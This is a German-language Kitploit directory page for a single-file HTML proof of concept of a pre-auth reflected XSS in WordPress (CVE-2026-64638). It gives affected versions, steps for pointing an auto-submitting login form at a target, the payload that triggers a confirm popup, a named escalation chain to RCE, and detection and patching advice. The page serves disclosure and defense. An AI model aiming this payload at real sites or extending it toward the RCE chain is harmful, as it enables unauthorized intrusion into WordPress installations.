Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/4minx/cve-2026-64638
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsPayload-Entwicklung
GitHub4minx/cve-2026-64638

CVE-2026-64638

Ein HTML-Proof-of-Concept als einzelne Datei für reflektiertes WordPress-XSS vor der Authentifizierung (CVE-2026-64638), das die Ausführung von JavaScript ohne Authentifizierung sowie eine XSS-zu-RCE-Kette per DOM-Clobbering und App-Passwort-Upload demonstriert.

Repository anzeigen
1vor 13 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

XSS2Shell Alert PoC (CVE-2026-64638)

Proof of Concept für Pre-Auth Reflected XSS in WordPress

Ein HTML-Proof-of-Concept in einer einzigen Datei für das Parser-Differenzial-XSS CVE-2026-64638 (XSS2Shell) im WordPress-Core. Es demonstriert die Ausführung von nicht authentifiziertem JavaScript im WordPress-Origin über eine präparierte Login-Anfrage.


Informationen zur Schwachstelle

  • CVE: CVE-2026-64638 (XSS2Shell)
  • Typ: Pre-Auth Reflected XSS (Parser-Differenzial: strip_tags() vs. wp_kses_post())
  • Eskalation: Kann zu RCE verkettet werden (DOM-Clobbering → REST JSONP → SOME → Application Password → Plugin-Upload)
  • Betroffen: WordPress 6.4 – 7.0.2 (praktisch ausnutzbarer Bereich)
  • Behoben: WordPress 7.0.3 (auf gepflegte Zweige bis hinunter zu 4.7 rückportiert)

Verwendung

  1. Öffne POC.html in einem Texteditor.
  2. Ersetze http://TARGET/wp-login.php im action-Attribut des Formulars durch dein Ziel.
root@kitploit:~
<form id="poc" method="post" action="http://TARGET/wp-login.php">
  1. Öffne die Datei in einem Browser. Das Formular wird automatisch abgeschickt; wenn das Ziel verwundbar ist, wird ein Popup (confirm() bzw. alert()) im WordPress-Origin ausgelöst.

PoC-Payload

root@kitploit:~
< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X

Das Leerzeichen nach jedem < ist der Exploit. Ohne das Leerzeichen entfernt wp_strip_all_tags() alles.


Voraussetzungen

  • Eine verwundbare WordPress-Installation (6.4 – 7.0.2, nicht gepatcht)
  • Ein Browser mit aktiviertem JavaScript
  • Keine Tool-Abhängigkeiten (reines HTML)

Erkennung / Gegenmaßnahmen

  • Aktualisiere auf WordPress 7.0.3 oder einen gepatchten Zweig.
  • Widerrufe bzw. rotiere nach dem Patchen alle vorhandenen Application Passwords.
  • Blockiere Muster aus %3C plus Leerzeichen im log-Feld an der WAF/am Edge.
  • Überwache POST /wp-login.php-Anfragen, bei denen log ein kodiertes < enthält.

Referenzen

  • pwn.ai — XSS2Shell: WordPress Preauth XSS to RCE Chain
  • WordPress 7.0.3 Release
  • Hadrian — CVE-2026-64638-Analyse
  • IONSEC — XSS2Shell technische Analyse
Tool herunterladen